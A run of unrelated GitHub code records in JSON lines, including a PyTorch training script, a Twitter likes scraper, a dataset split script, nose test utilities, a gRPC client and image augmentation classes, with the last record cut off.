fill=BOTH)\n ttk.Label(self, text=\"Dein Getränk: \" +str(beverage.name), style=\"drinkfinished.TLabel\").pack(side=BOTTOM, expand=YES, fill=BOTH)\n Grid.columnconfigure(self, 0, weight=1)\n else:\n ttk.Label(topframe, text=\"Der BarMan ist nun gereinigt!\", style=\"drinkfinished.big.TLabel\").pack(side=TOP,\n expand=YES,\n fill=BOTH)\n topframe.pack(side=TOP, expand=YES, fill=BOTH)\n ttk.Label(self, text=\"Überprüfe ob alles Sauber ist\", style=\"drinkfinished.TLabel\").pack(side=BOTTOM,\n expand=YES,\n fill=BOTH)\n Grid.columnconfigure(self, 0, weight=1)\n","repo_name":"Flodeplay/BarMan-Device","sub_path":"Main/View/Frames/Drink/drink.py","file_name":"drink.py","file_ext":"py","file_size_in_byte":9221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28302833853","text":"fake = [1]*23481\ntrue = [0]*21417\n\nimport pandas as pd\nimport pandas\nimport numpy as np\n\n\ndf_true = pandas.read_csv(\"True.csv\")\n\ndf_true['labels'] = true\ndf_true.to_csv('new_true.csv')\n\ndf_fake = pandas.read_csv(\"Fake.csv\")\n\ndf_fake['labels'] = fake\ndf_fake.to_csv('new_fake.csv')\n\ntrain_data = pd.concat([df_true,df_fake],ignore_index=True)\n\n# Shuffling dataframe\ntrain_data = train_data.sample(frac=1).reset_index(drop=True)\n\n#partitioning into train,test and validation\n\nmsk = np.random.rand(len(train_data)) < 0.8\n\ntrain_temp = train_data[msk]\n\nval = np.random.rand(len(train_temp)) < 0.0625\n\ntrain_df = train_temp[~val]\nvalidation_df = train_temp[val]\ntest_df = train_data[~msk]\n\nprint(len(train_df))\nprint(len(test_df))\nprint(len(validation_df))\n\ntrain_df.to_csv(\"isot_train.csv\")\ntest_df.to_csv(\"isot_test.csv\")\nvalidation_df.to_csv(\"isot_validation.csv\")\n\n\n\n\n\n\n\n\n\n\n","repo_name":"PrasadKshirsagar/Fake-News-Detection-Using-Deep-Learning-Techniques","sub_path":"Datasets/ISOT_News _dataset/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28337914071","text":"'''\nAuthor: mengzonefire\nDate: 2023-03-01 13:58:17\nLastEditTime: 2023-03-15 00:33:39\nLastEditors: mengzonefire\nDescription: likes页爬取任务类\n'''\n\nimport time\nimport httpx\n\nfrom common.text import *\nfrom common.const import *\nfrom common.tools import getHttpText\nfrom task.baseTask import Task\n\n\nclass UserLikesTask(Task):\n\n def __init__(self, userName: str, uname, userId: int, cfg):\n super(UserLikesTask, self).__init__()\n self.userName = userName\n self.uname = uname\n self.userId = userId\n self.cfg = cfg\n # self.savePath = os.path.join(getContext('dl_path'), userName, 'likes')\n self.savePath = '{}/{}/likes'.format(getContext('dl_path'), userName)\n self.saveUri = '@{}/likes'.format(userName)\n def getDataList(self, cursor='', rest_id_list=[]):\n while True:\n if self.stop:\n return\n cursorPar = cursor and '\"cursor\":\"{}\",'.format(cursor)\n response = None\n with httpx.Client(proxies=getContext('proxy'), headers=getContext('headers'), verify=False) as client:\n for i in range(1, 56):\n try:\n response = client.get(userLikesApi, params={\n 'variables': userLikesApiPar.format(self.userId, twtCount, cursorPar),\n 'features': commonApiPar})\n break\n except (httpx.ConnectTimeout, httpx.ReadTimeout, httpx.ConnectError, httpx.RemoteProtocolError):\n if i >= 55:\n print(network_error_warning)\n self.stopGetDataList()\n return\n else:\n print(timeout_warning.format(i))\n time.sleep(0.3)\n if not response:\n self.stopGetDataList()\n return\n if response.status_code != httpx.codes.OK:\n print(http_warning.format('UserLikesTask.getDataList',\n response.status_code, getHttpText(response.status_code)))\n self.stopGetDataList()\n return\n self.pageContent = response.json()\n cursor, rest_id_list = self.parseData(cursor, rest_id_list)\n if not cursor:\n break\n","repo_name":"qhg1997/twitter-downloader","sub_path":"task/userLikesTask.py","file_name":"userLikesTask.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"70833549312","text":"import math\nimport torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport numpy as np\nimport os, sys\nimport time\nimport tabulate\nimport data\nimport training_utils\nimport nets as models\nimport numpy as np\nfrom parser_train import parser\n\ncolumns = [\"ep\", \"lr\", \"tr_loss\", \"tr_acc\", \"te_loss\", \"te_acc\", \"time\"]\n\ndef set_random_seed(seed):\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\ndef cross_entropy(model, x, target, reduction=\"mean\"):\n \"\"\"standard cross-entropy loss function\"\"\"\n if model is not None:\n output = model(x)\n else:\n output = x\n\n loss = F.cross_entropy(output, target, reduction=reduction)\n\n if reduction is None or reduction == \"none\":\n loss = loss\n if reduction == 'mean':\n loss = torch.mean(loss)\n if reduction == 'sum':\n loss = torch.sum(loss)\n\n if model is not None:\n return loss, output\n\n return loss\n\n\ndef squared_loss(model, x, target, reduction=\"mean\"):\n \"\"\"\n В num_class / 2 (=5) меньше чем у Кати. Т.е. мой lr в num_class / 2 (=5) раз меньше чем Катин\n \"\"\"\n if model is not None:\n output = model(x)\n else:\n output = x\n\n loss = (\n torch.sum(torch.square(output), dim=1) -\n 2 * torch.gather(output, 1, target.view(-1, 1)).reshape(-1) + 1\n ) / output.shape[1]\n\n if reduction is None or reduction == \"none\":\n loss = loss\n if reduction == 'mean':\n loss = torch.mean(loss)\n if reduction == 'sum':\n loss = torch.sum(loss)\n\n if model is not None:\n return loss, output\n\n return loss\n\ndef check_si_name(n, model_name='ResNet18'):\n if model_name == 'ResNet18':\n return \"conv1\" in n or \"1.bn1\" in n or \"1.0.bn1\" in n or ((\"conv2\" in n or \"short\" in n) and \"4\" not in n)\n elif model_name == 'ResNet18SI':\n return 'linear' not in n\n elif model_name == 'ResNet18SIAf':\n return ('linear' not in n and 'bn' not in n and 'shortcut.0' not in n)\n elif 'ConvNetSICI3WN' in model_name:\n return 'weight_v' in n\n elif 'ConvNet' in model_name:\n return 'conv_layers.0.' in n or 'conv_layers.3.' in n or 'conv_layers.7.' in n or 'conv_layers.11.' in n\n return False\n\ndef main():\n args = parser()\n args.device = None\n \n os.environ['CUDA_DEVICE_ORDER']='PCI_BUS_ID'\n os.environ['CUDA_VISIBLE_DEVICES']=args.gpu\n\n if torch.cuda.is_available():\n args.device = torch.device(\"cuda\")\n args.cuda = True\n else:\n args.device = torch.device(\"cpu\")\n args.cuda = False\n \n torch.backends.cudnn.benchmark = True\n set_random_seed(args.seed)\n\n # n_trials = 1\n \n print(\"Preparing base directory %s\" % args.dir)\n os.makedirs(args.dir, exist_ok=True)\n\n # for trial in range(n_trials):\n trial = args.trial\n output_dir = args.dir + f\"/trial_{trial}\"\n \n ### resuming is modified!!!\n if args.resume_epoch > -1:\n resume_dir = output_dir\n output_dir = output_dir + f\"/from_{args.resume_epoch}_for_{args.epochs}\"\n if args.save_freq_int > 0:\n output_dir = output_dir + f\"_save_int_{args.save_freq_int}\"\n if args.noninvlr >= 0:\n output_dir = output_dir + f\"_noninvlr_{args.noninvlr}\"\n if args.fix_si_pnorm:\n output_dir = output_dir + f\"_fix_si_pnorm\"\n if args.seed > 1:\n output_dir = output_dir + '_seed{}'.format(args.seed)\n \n ### resuming is modified!!!\n print(\"Preparing directory %s\" % output_dir)\n\n os.makedirs(output_dir, exist_ok=True)\n with open(os.path.join(output_dir, \"command.sh\"), \"w\") as f:\n f.write(\" \".join(sys.argv))\n f.write(\"\\n\")\n\n print(\"Using model %s\" % args.model)\n model_cfg = getattr(models, args.model)\n\n print(\"Loading dataset %s from %s\" % (args.dataset, args.data_path))\n transform_train = model_cfg.transform_test if args.no_aug else model_cfg.transform_train\n loaders, num_classes = data.loaders(\n args.dataset,\n args.data_path,\n args.batch_size,\n args.num_workers,\n transform_train,\n model_cfg.transform_test,\n use_validation=not args.use_test,\n use_data_size = args.use_data_size,\n split_classes=args.split_classes,\n corrupt_train=args.corrupt_train\n )\n\n print(\"Preparing model\")\n print(*model_cfg.args)\n\n # add extra args for varying names\n if 'ResNet18' in args.model:\n extra_args = {'init_channels':args.num_channels}\n if \"SI\" in args.model:\n extra_args.update({'linear_norm':args.init_scale})\n elif 'ConvNet' in args.model:\n extra_args = {'init_channels':args.num_channels, 'max_depth':args.depth,'init_scale':args.init_scale}\n elif args.model == 'LeNet':\n extra_args = {'scale':args.scale}\n else:\n extra_args = {}\n\n if args.same_init:\n set_random_seed(228)\n model = model_cfg.base(*model_cfg.args, num_classes=num_classes, **model_cfg.kwargs,\n **extra_args)\n set_random_seed(args.seed)\n \n else:\n model = model_cfg.base(*model_cfg.args, num_classes=num_classes, **model_cfg.kwargs,\n **extra_args)\n \n if args.same_last_layer and 'ConvNet' in args.model:\n set_random_seed(228)\n fin = nn.Linear(model.linear_layers[-1].in_features,model.linear_layers[-1].out_features) \n alpha = args.init_scale\n W = fin.weight.data\n model.linear_layers[-1].weight.data = alpha * W / W.norm()\n model.linear_layers[-1].bias.data = fin.bias.data\n set_random_seed(args.seed)\n\n if args.same_last_layer and 'ResNet18' in args.model:\n set_random_seed(228)\n fin = nn.Linear(model.linear.in_features,model.linear.out_features,bias=False)\n alpha = args.init_scale\n W = fin.weight.data\n model.linear.weight.data = alpha * W / W.norm()\n set_random_seed(args.seed)\n \n model.to(args.device)\n\n if args.fix_elr:\n print(\"Training with fixed ELR\")\n if args.momentum:\n print(\"WARNING: fixing ELR with momentum is ambiguous!\")\n\n if args.model == 'ResNet18':\n params_dict = dict(model.named_parameters())\n param_groups = []\n\n # single pre-BN params first\n singles = training_utils.get_resnet_prebn_groups(g=1)\n param_groups.extend([{\"params\": [params_dict[n] for n in group]} for group in singles])\n\n # then pairs of pre-BN params\n pairs = training_utils.get_resnet_prebn_groups(g=2)\n param_groups.extend([{\"params\": [params_dict[n] for n in group]} for group in pairs])\n\n # then triples of pre-BN params\n triples = training_utils.get_resnet_prebn_groups(g=3)\n param_groups.extend([{\"params\": [params_dict[n] for n in group]} for group in triples])\n\n # finally others\n other_params = [p for n, p in params_dict.items() if all(n not in g for g in singles + pairs + triples)]\n param_groups.append({\"params\": other_params})\n\n elif 'ConvNetSI' in args.model or args.model == 'ResNet18SI':\n param_groups = [\n {'params': [p for n, p in model.named_parameters() if check_si_name(n, args.model)]}, # SI params are convolutions\n {'params': [p for n, p in model.named_parameters() if not check_si_name(n, args.model)]}, # other params\n ]\n\n else:\n raise ValueError(\"Fixing ELR currently is not allowed for this model!\")\n\n # elr_coefs are coefs to multiply by lr * norm^2 for the fixed ELR, i.e.,\n # prebn_lr = elr_coef * lr * norm^2 => elr = prebn_lr / norm^2 = elr_coef * lr\n \n with torch.no_grad():\n si_pnorm_0 = np.sqrt(sum((p ** 2).sum().item() for p in param_groups[0][\"params\"]))\n lr = args.elr * si_pnorm_0 ** 2\n elif args.fix_all_elr:\n print(\"Training with all fixed ELRs\")\n if args.momentum:\n print(\"WARNING: fixing ELR with momentum is ambiguous!\")\n\n if 'ConvNetSI' in args.model or args.model == 'ResNet18SI':\n param_groups = [\n {'params': [p for n, p in model.named_parameters() if check_si_name(n, args.model)]}, # SI params are convolutions\n {'params': [p for n, p in model.named_parameters() if not check_si_name(n, args.model)]}, # other params\n ]\n else:\n raise ValueError(\"Fixing ELR currently is not allowed for this model!\")\n\n with torch.no_grad():\n si_pnorm_0 = np.sqrt(sum((p ** 2).sum().item() for p in param_groups[0][\"params\"]) /\n sum(p.shape[0] for p in param_groups[0][\"params\"]))\n training_utils.fix_si_pnorms(model, si_pnorm_0, args.model)\n pnorm_0_sqr_total = sum((p ** 2).sum().item() for p in param_groups[0][\"params\"])\n lr = args.elr * pnorm_0_sqr_total\n else:\n param_groups = model.parameters()\n si_pnorm_0 = None\n lr = args.lr_init\n elr_coefs = None\n \n if args.noninvlr >= 0:\n param_groups = [\n {'params': [p for n, p in model.named_parameters() if check_si_name(n, args.model)]}, \n {'params': [p for n, p in model.named_parameters() if not check_si_name(n, args.model)],'lr':args.noninvlr}, \n ]\n\n optimizer = torch.optim.SGD(param_groups, \n lr=lr, \n momentum=args.momentum, \n weight_decay=args.wd)\n\n if args.cosan_schedule:\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs)\n \n epoch_from = args.resume_epoch + 1\n epoch_to = epoch_from + args.epochs\n print(f\"Training from {epoch_from} to {epoch_to - 1} epochs\")\n\n if args.resume_epoch > -1:\n # Warning: due to specific lr schedule, resuming is generally not recommended!\n print(f\"Loading checkpoint from the {args.resume_epoch} epoch\")\n state = training_utils.load_checkpoint(resume_dir, args.resume_epoch)\n model.load_state_dict(state['state_dict'])\n optimizer.load_state_dict(state['optimizer'])\n if args.noninvlr >= 0:\n optimizer.param_groups[1][\"lr\"] = args.noninvlr\n \n else:\n #save init\n train_res = {\"loss\": None, \"accuracy\": None}\n test_res = {\"loss\": None, \"accuracy\": None}\n \n def save_epoch(epoch):\n training_utils.save_checkpoint(\n output_dir,\n epoch,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict(),\n train_res=train_res,\n test_res=test_res\n )\n\n save_epoch(0)\n epoch_from +=1\n\n \n for epoch in range(epoch_from, epoch_to+1):\n train_epoch(model, loaders, squared_loss if args.use_squared_loss else cross_entropy, optimizer,\n epoch=epoch, \n end_epoch=epoch_to+1, \n eval_freq=args.eval_freq, \n save_freq=args.save_freq,\n save_freq_int=args.save_freq_int,\n fix_elr = args.fix_elr,\n fix_all_elr=args.fix_all_elr,\n si_pnorm_0=si_pnorm_0,\n output_dir=output_dir,\n lr_init=lr,\n lr_schedule=not args.no_schedule,\n noninvlr=args.noninvlr,\n c_schedule=args.c_schedule,\n d_schedule=args.d_schedule,\n fbgd=args.fbgd,\n cosan_schedule = args.cosan_schedule,\n model_name = args.model)\n if args.cosan_schedule:\n scheduler.step()\n\n print(\"model \", trial, \" done\")\n\n\ndef train_epoch(model, loaders, criterion, optimizer, epoch, end_epoch,\n eval_freq=1, save_freq=10, save_freq_int=0, fix_elr=False, fix_all_elr = False,\n si_pnorm_0=None,output_dir='./',\n lr_init=0.01, lr_schedule=True, noninvlr = -1, c_schedule=None, d_schedule=None,\n fbgd=False, cosan_schedule = False, model_name = 'ResNet18'):\n\n time_ep = time.time()\n\n if not cosan_schedule:\n if not lr_schedule:\n lr = lr_init\n elif c_schedule > 0:\n lr = training_utils.c_schedule(epoch, lr_init, end_epoch, c_schedule)\n elif d_schedule > 0:\n lr = training_utils.d_schedule(epoch, lr_init, end_epoch, d_schedule)\n else:\n lr = training_utils.schedule(epoch, lr_init, end_epoch, swa=False)\n if noninvlr >= 0:\n training_utils.adjust_learning_rate_only_conv(optimizer, lr)\n else:\n training_utils.adjust_learning_rate(optimizer, lr)\n else:\n for param_group in optimizer.param_groups:\n lr = param_group[\"lr\"]\n break\n\n train_res = training_utils.train_epoch(loaders[\"train\"], model, criterion, optimizer, fbgd=fbgd,\n save_freq_int=save_freq_int, epoch = epoch,\n output_dir=output_dir, fix_elr = fix_elr, fix_all_elr = fix_all_elr,\n si_pnorm_0=si_pnorm_0, model_name = model_name)\n if (\n epoch == 1\n or epoch % eval_freq == eval_freq - 1\n or epoch == end_epoch - 1\n ):\n test_res = training_utils.eval(loaders[\"test\"], model, criterion)\n else:\n test_res = {\"loss\": None, \"accuracy\": None}\n \n def save_epoch(epoch):\n training_utils.save_checkpoint(\n output_dir,\n epoch,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict(),\n train_res=train_res,\n test_res=test_res\n )\n\n if save_freq is None:\n if training_utils.do_report(epoch):\n save_epoch(epoch)\n elif epoch % save_freq == 0:\n save_epoch(epoch)\n \n time_ep = time.time() - time_ep\n values = [\n epoch,\n lr,\n train_res[\"loss\"],\n train_res[\"accuracy\"],\n test_res[\"loss\"],\n test_res[\"accuracy\"],\n time_ep,\n ]\n table = tabulate.tabulate([values], columns, tablefmt=\"simple\", floatfmt=\"8.4f\")\n if epoch % 40 == 1:\n table = table.split(\"\\n\")\n table = \"\\n\".join([table[1]] + table)\n else:\n table = table.split(\"\\n\")[2]\n print(table)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tipt0p/three_regimes_on_the_sphere","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14668,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"22865843610","text":"\"\"\"Utility functions and classes used by nose internally.\n\"\"\"\nimport inspect\nimport logging\nimport os\nimport re\nimport sys\nimport types\nimport unittest\nfrom compiler.consts import CO_GENERATOR\n\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n from StringIO import StringIO\n\nfrom nose.config import Config\n\nlog = logging.getLogger('nose')\n\ndef absdir(path):\n \"\"\"Return absolute, normalized path to directory, if it exists; None\n otherwise.\n \"\"\"\n if not os.path.isabs(path):\n path = os.path.normpath(os.path.abspath(os.path.join(os.getcwd(),\n path)))\n if path is None or not os.path.isdir(path):\n return None\n return path\n\n\ndef absfile(path, where=None):\n \"\"\"Return absolute, normalized path to file (optionally in directory\n where), or None if the file can't be found either in where or the current\n working directory.\n \"\"\"\n orig = path\n if where is None:\n where = os.getcwd()\n if isinstance(where, list) or isinstance(where, tuple):\n for maybe_path in where:\n maybe_abs = absfile(path, maybe_path)\n if maybe_abs is not None:\n return maybe_abs\n return None\n if not os.path.isabs(path):\n path = os.path.normpath(os.path.abspath(os.path.join(where, path)))\n if path is None or not os.path.exists(path):\n if where != os.getcwd():\n # try the cwd instead\n path = os.path.normpath(os.path.abspath(os.path.join(os.getcwd(),\n orig)))\n if path is None or not os.path.exists(path):\n return None\n if os.path.isdir(path):\n # might want an __init__.py from pacakge\n init = os.path.join(path,'__init__.py')\n if os.path.isfile(init):\n return init\n elif os.path.isfile(path):\n return path\n return None\n\n\ndef anyp(predicate, iterable):\n for item in iterable:\n if predicate(item):\n return True\n return False\n\n\ndef file_like(name):\n return os.path.dirname(name) or name.endswith('.py')\n\n\ndef func_lineno(func):\n \"\"\"Get the line number of a function. First looks for\n compat_co_firstlineno, then func_code.co_first_lineno.\n \"\"\"\n try:\n return func.compat_co_firstlineno\n except AttributeError:\n return func.func_code.co_firstlineno\n\n\ndef is_generator(func):\n try:\n return func.func_code.co_flags & CO_GENERATOR != 0\n except AttributeError:\n return False\n\n \ndef split_test_name(test):\n \"\"\"Split a test name into a 3-tuple containing file, module, and callable\n names, any of which (but not all) may be blank.\n\n Test names are in the form:\n\n file_or_module:callable\n\n Either side of the : may be dotted. To change the splitting behavior, you\n can alter nose.util.split_test_re.\n \"\"\"\n parts = test.split(':')\n num = len(parts)\n if num == 1:\n # only a file or mod part\n if file_like(test):\n return (test, None, None)\n else:\n return (None, test, None)\n elif num >= 3:\n # definitely popped off a windows driveletter\n file_or_mod = ':'.join(parts[0:-1])\n fn = parts[-1]\n else:\n # only a file or mod part, or a test part, or\n # we mistakenly split off a windows driveletter\n file_or_mod, fn = parts\n if len(file_or_mod) == 1:\n # windows drive letter: must be a file\n if not file_like(fn):\n raise ValueError(\"Test name '%s' is ambiguous; can't tell \"\n \"if ':%s' refers to a module or callable\"\n % (test, fn))\n return (test, None, None) \n if file_or_mod:\n if file_like(file_or_mod):\n return (file_or_mod, None, fn)\n else:\n return (None, file_or_mod, fn)\n else:\n return (None, None, fn)\n\n \ndef test_address(test):\n \"\"\"Find the test address for a test, which may be a module, filename,\n class, method or function.\n \"\"\"\n # type-based polymorphism sucks in general, but I believe is\n # appropriate here\n t = type(test)\n if t == types.ModuleType:\n return (os.path.abspath(test.__file__), test.__name__)\n if t == types.FunctionType:\n m = sys.modules[test.__module__]\n return (os.path.abspath(m.__file__), test.__module__, test.__name__)\n if t in (type, types.ClassType):\n m = sys.modules[test.__module__]\n return (os.path.abspath(m.__file__), test.__module__, test.__name__)\n if t == types.InstanceType:\n return test_address(test.__class__)\n if t == types.MethodType:\n cls_adr = test_address(test.im_class)\n return (cls_adr[0], cls_adr[1],\n \"%s.%s\" % (cls_adr[2], test.__name__))\n # handle unittest.TestCase instances\n if isinstance(test, unittest.TestCase):\n if hasattr(test, 'testFunc'):\n # nose FunctionTestCase\n return test_address(test.testFunc)\n if hasattr(test, '_FunctionTestCase__testFunc'):\n # unittest FunctionTestCase\n return test_address(test._FunctionTestCase__testFunc)\n if hasattr(test, 'testCase'):\n # nose MethodTestCase\n return test_address(test.testCase)\n # regular unittest.TestCase\n cls_adr = test_address(test.__class__)\n # 2.5 compat: __testMethodName changed to _testMethodName\n try:\n method_name = test._TestCase__testMethodName\n except AttributeError:\n method_name = test._testMethodName\n return (cls_adr[0], cls_adr[1],\n \"%s.%s\" % (cls_adr[2], method_name))\n raise TypeError(\"I don't know what %s is (%s)\" % (test, t))\n\n\ndef try_run(obj, names):\n \"\"\"Given a list of possible method names, try to run them with the\n provided object. Keep going until something works. Used to run\n setup/teardown methods for module, package, and function tests.\n \"\"\"\n for name in names:\n func = getattr(obj, name, None)\n if func is not None:\n if type(obj) == types.ModuleType:\n # py.test compatibility\n try:\n args, varargs, varkw, defaults = inspect.getargspec(func)\n except TypeError:\n # Not a function. If it's callable, call it anyway\n if hasattr(func, '__call__'):\n func = func.__call__\n try:\n args, varargs, varkw, defaults = \\\n inspect.getargspec(func)\n args.pop(0) # pop the self off\n except TypeError:\n raise TypeError(\"Attribute %s of %r is not a python \"\n \"function. Only functions or callables\"\n \" may be used as fixtures.\" %\n (name, obj)) \n if len(args):\n log.debug(\"call fixture %s.%s(%s)\", obj, name, obj) \n return func(obj)\n log.debug(\"call fixture %s.%s\", obj, name)\n return func()\n\n \ndef tolist(val):\n \"\"\"Convert a value that may be a list or a (possibly comma-separated)\n string into a list. The exception: None is returned as None, not [None].\n \"\"\"\n if val is None:\n return None\n try:\n # might already be a list\n val.extend([])\n return val\n except AttributeError:\n pass\n # might be a string\n try:\n return re.split(r'\\s*,\\s*', val)\n except TypeError:\n # who knows... \n return list(val)\n","repo_name":"thraxil/gtreed","sub_path":"working-env/lib/python2.5/nose-0.9.3-py2.5.egg/nose/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"42561396678","text":"import grpc\nimport hello_pb2\nimport hello_pb2_grpc\n\n\ndef run_client():\n with grpc.insecure_channel('localhost:50051') as channel:\n stub = hello_pb2_grpc.BasicServiceStub(channel)\n try:\n response = stub.BasicFunction(hello_pb2.BasicRequest(request=\"grpc!\"))\n except grpc.RpcError as e:\n print(e.code())\n print(e.details())\n\n\nif __name__ == '__main__':\n run_client()\n","repo_name":"Rahonam/grpc","sub_path":"python-error/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12391123486","text":"import math\nimport numbers\nimport random\nimport numpy as np\nimport torchvision.transforms.functional as tf\nimport cv2\nfrom scipy.ndimage.interpolation import map_coordinates\nfrom scipy.ndimage.filters import gaussian_filter\nfrom PIL import Image, ImageOps\nimport collections\nfrom matplotlib import pyplot as plt\n\n\nclass Compose(object):\n def __init__(self, augmentations):\n self.augmentations = augmentations\n self.PIL = True\n\n def __call__(self, img, mask):\n if isinstance(img, np.ndarray):\n self.PIL = False\n\n if self.PIL:\n img = np.array(img)\n mask = np.array(mask)\n\n assert img.shape[:2] == mask.shape[:2]\n\n for a in self.augmentations:\n img, mask = a(img, mask)\n\n return img, mask\n\n\nclass RandomCrop(object):\n def __init__(self, size, padding=0):\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n self.padding = padding\n\n def __call__(self, img, mask):\n if self.padding > 0:\n img = ImageOps.expand(img, border=self.padding, fill=0)\n mask = ImageOps.expand(mask, border=self.padding, fill=0)\n\n # assert img.size == mask.size\n w, h = img.size\n th, tw = self.size\n if w == tw and h == th:\n return img, mask\n if w < tw or h < th:\n return img.resize((tw, th), Image.BILINEAR), mask.resize((tw, th), Image.NEAREST)\n\n x1 = random.randint(0, w - tw)\n y1 = random.randint(0, h - th)\n return img.crop((x1, y1, x1 + tw, y1 + th)), mask.crop((x1, y1, x1 + tw, y1 + th))\n\n\nclass AdjustGamma(object):\n def __init__(self, gamma):\n self.gamma = gamma\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return tf.adjust_gamma(img, random.uniform(1, 1 + self.gamma)), mask\n\n\nclass AdjustSaturation(object):\n def __init__(self, saturation):\n self.saturation = saturation\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return (\n tf.adjust_saturation(img, random.uniform(1 - self.saturation, 1 + self.saturation)),\n mask,\n )\n\n\nclass AdjustHue(object):\n def __init__(self, hue):\n self.hue = hue\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return tf.adjust_hue(img, random.uniform(-self.hue, self.hue)), mask\n\n\nclass AdjustBrightness(object):\n def __init__(self, bf):\n self.bf = bf\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return tf.adjust_brightness(img, random.uniform(1 - self.bf, 1 + self.bf)), mask\n\n\nclass AdjustContrast(object):\n def __init__(self, cf):\n self.cf = cf\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return tf.adjust_contrast(img, random.uniform(1 - self.cf, 1 + self.cf)), mask\n\n\nclass CenterCrop(object):\n def __init__(self, size, padding=0):\n self.padding = padding\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n if self.padding > 0:\n img = ImageOps.expand(img, border=self.padding, fill=0)\n mask = ImageOps.expand(mask, border=self.padding, fill=0)\n\n w, h = img.size\n th, tw = self.size\n\n if w == tw and h == th:\n return img, mask\n if w < tw or h < th:\n return (img.resize((tw, th), Image.BILINEAR), mask.resize((tw, th), Image.NEAREST))\n\n x1 = int(round((w - tw) / 2.0))\n y1 = int(round((h - th) / 2.0))\n return (img.crop((x1, y1, x1 + tw, y1 + th)), mask.crop((x1, y1, x1 + tw, y1 + th)))\n\n'''\nclass RandomHorizontallyFlip(object):\n def __init__(self, p):\n self.p = p\n\n def __call__(self, img, mask, contour):\n if random.random() < self.p:\n return (img.transpose(Image.FLIP_LEFT_RIGHT), mask.transpose(Image.FLIP_LEFT_RIGHT), contour.transpose(Image.FLIP_LEFT_RIGHT))\n return img, mask, contour\n\n\nclass RandomVerticallyFlip(object):\n def __init__(self, p):\n self.p = p\n\n def __call__(self, img, mask):\n if random.random() < self.p:\n return (img.transpose(Image.FLIP_TOP_BOTTOM), mask.transpose(Image.FLIP_TOP_BOTTOM))\n return img, mask\n'''\n\n\nclass RandomHorizontalFlip(object):\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, image, label):\n if random.random() < self.p:\n image = cv2.flip(image, 1)\n label = cv2.flip(label, 1)\n return image, label\n\n\nclass RandomVerticalFlip(object):\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, image, label):\n if random.random() < self.p:\n image = cv2.flip(image, 0)\n label = cv2.flip(label, 0)\n return image, label\n\n\n\n\nclass FreeScale(object):\n def __init__(self, size):\n self.size = tuple(reversed(size)) # size: (h, w)\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n return (img.resize(self.size, Image.BILINEAR), mask.resize(self.size, Image.NEAREST))\n\n\nclass RandomTranslate(object):\n def __init__(self, offset):\n # tuple (delta_x, delta_y)\n self.offset = offset\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n x_offset = int(2 * (random.random() - 0.5) * self.offset[0])\n y_offset = int(2 * (random.random() - 0.5) * self.offset[1])\n\n x_crop_offset = x_offset\n y_crop_offset = y_offset\n if x_offset < 0:\n x_crop_offset = 0\n if y_offset < 0:\n y_crop_offset = 0\n\n cropped_img = tf.crop(\n img,\n y_crop_offset,\n x_crop_offset,\n img.size[1] - abs(y_offset),\n img.size[0] - abs(x_offset),\n )\n\n if x_offset >= 0 and y_offset >= 0:\n padding_tuple = (0, 0, x_offset, y_offset)\n\n elif x_offset >= 0 and y_offset < 0:\n padding_tuple = (0, abs(y_offset), x_offset, 0)\n\n elif x_offset < 0 and y_offset >= 0:\n padding_tuple = (abs(x_offset), 0, 0, y_offset)\n\n elif x_offset < 0 and y_offset < 0:\n padding_tuple = (abs(x_offset), abs(y_offset), 0, 0)\n\n return (\n tf.pad(cropped_img, padding_tuple, padding_mode=\"reflect\"),\n tf.affine(\n mask,\n translate=(-x_offset, -y_offset),\n scale=1.0,\n angle=0.0,\n shear=0.0,\n fillcolor=250,\n ),\n )\n\n\nclass RandomRotate(object):\n def __init__(self, degree):\n self.degree = degree\n\n def __call__(self, img, mask):\n rotate_degree = random.random() * 2 * self.degree - self.degree\n return (\n tf.affine(\n img,\n translate=(0, 0),\n scale=1.0,\n angle=rotate_degree,\n resample=Image.BILINEAR,\n fillcolor=(0, 0, 0),\n shear=0.0,\n ),\n tf.affine(\n mask,\n translate=(0, 0),\n scale=1.0,\n angle=rotate_degree,\n resample=Image.NEAREST,\n fillcolor=250,\n shear=0.0,\n ),\n )\n\n\nclass Scale(object):\n def __init__(self, size_w, size_h):\n self.size_w = size_w\n self.size_h = size_h\n\n def __call__(self, img, mask):\n assert img.shape[:2] == mask.shape[:2]\n w, h = img.shape[:2]\n if (w >= h and w == self.size_w) or (h >= w and h == self.size_h):\n return img, mask\n if w > h:\n ow = self.size_w\n oh = int(self.size_h * h / w)\n return cv2.resize(img, (ow, oh)), cv2.resize(mask, (ow, oh), cv2.INTER_NEAREST)\n else:\n ow = 